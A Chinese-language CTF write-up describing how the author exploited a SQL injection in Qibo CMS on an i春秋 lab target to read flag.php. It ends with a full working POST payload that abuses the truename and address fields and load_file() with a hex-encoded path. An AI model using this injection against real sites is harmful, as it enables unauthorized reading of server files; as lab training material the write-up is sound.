題目在i春秋ctf大本營
又是一道cms的題,打開御劍一通亂掃,發現后台登錄地址,訪問一看妥妥的齊博cms
記得以前很久以前利用一個注入通用漏洞,這里我貼上鏈接,里面有原理與利用方法詳細說明:
按照這個思路,我們先在首頁注冊test1賬號並登錄,直接訪問注入的頁面,
先按照之前的套路進行測試:
訪問用戶信息發現成功執行,說明存在注入漏洞:
之前在打開主頁的同時,網頁上也給出了絕對路徑
因為之前的掃描發現根目錄下存在flag.php文件,所以這里應該可以通過注入語句直接讀取該文件:
emmmmmmmm報錯了,看來是搞錯目錄了
重新POST新的路徑:
url:http://6ee916f6234145eea7de5e0ea799d62b5cb205b5bf6c48e2.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
POST:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)) where uid=3%23
這次成功了